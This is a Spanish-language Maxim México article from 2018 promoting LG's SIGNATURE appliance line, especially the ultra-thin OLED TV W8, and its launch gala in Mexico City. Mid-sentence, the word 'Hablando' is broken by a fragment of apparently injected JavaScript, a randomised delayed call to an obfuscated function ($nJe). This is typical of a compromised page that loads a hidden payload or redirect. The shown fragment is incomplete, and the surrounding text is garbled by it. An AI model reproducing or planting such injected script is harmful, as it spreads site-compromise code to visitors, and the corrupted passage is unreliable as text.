Asómbrate con la pantalla de TV más delgada | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Asómbrate con la pantalla de TV más delgada

    Conoce la nueva línea ultra premium de LG.

    Autor: Redacción Maxim 13 agosto, 2018


    Televisor LG SIGNATURE OLED TV W8
    Cortesía.

     

    LG OLED TV W8: una experiencia inmersiva y refinada

     

    La pantalla de televisor LG SIGNATURE OLED TV W8 se ha convertido en el centro de atención gracias a su asombroso y ultradelgado diseño de tan solo 2.57 milímetros de grosor. Para enfocarse en la esencia misma del televisor, se han eliminado todos los elementos que distraen la visualización y la escucha, lo que resulta en un diseño que desaparece sorpresivamente sobre la pared. Sin sombras, el LG SIGNATURE OLED TV W8 es como una ventana a otro mundo.

     

     

     

     

    La marca ultra premium LG SIGNATURE se encontrará oficialmente disponible este otoño en las tiendas departamentales más exclusivas del país. Para celebrar la llegada de la lujosa familia de electrodomésticos, la firma dio a conocer LG SIGNATURE Gallery en una gala que tuvo lugar en el Museo Soumaya de la Ciudad de México.

     

    LG Signature pantalla de televisor

     

     

    Hablandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de electrodomésticos cool, te recomendamos leer ‘A las mujeres también se las enamora con lo mejor de la tecnología’.

     

     

    LG SIGNATURE, la línea ultrapremium

     

    Los cuatro productos de la línea fueron exhibidos como obras de arte dentro de la LG SIGNATURE Gallery, que sorprendió a los invitados una vez que los telones develaron los cautivadores productos. Posteriormente, se invitó a los asistentes a experimentar de primera mano la tecnología y diseño distintivos de esta marca.

     

    LG SIGNATURE se asoció con el talentoso arquitecto Germán Velasco, la creativa diseñadora Carmen Cordera y la reconocida chef Lula Martín del Campo, para presentar la nueva línea de productos ultra premium ante la comunidad de diseño, moda, gastronomía y estilo de vida de México. Velasco, Cordera y Martín del Campo hablaron sobre su experiencia con los productos y el impacto que estos han tenido en sus carreras profesionales y vidas personales.

     

     LG Signature pantalla de televisor
    LG OLED TV W8

     

     

     

    LG Signature Purifier
    LG Air Purifier

     

     

    LG Signature Refrigerator
    LG Instaview Door-in-Door™

     

     

    LG Signature WM Revolución
    LG TwinWash™

     

     

    Temas relacionados con esta nota: , , ,

Conoce la nueva línea ultra premium de LG.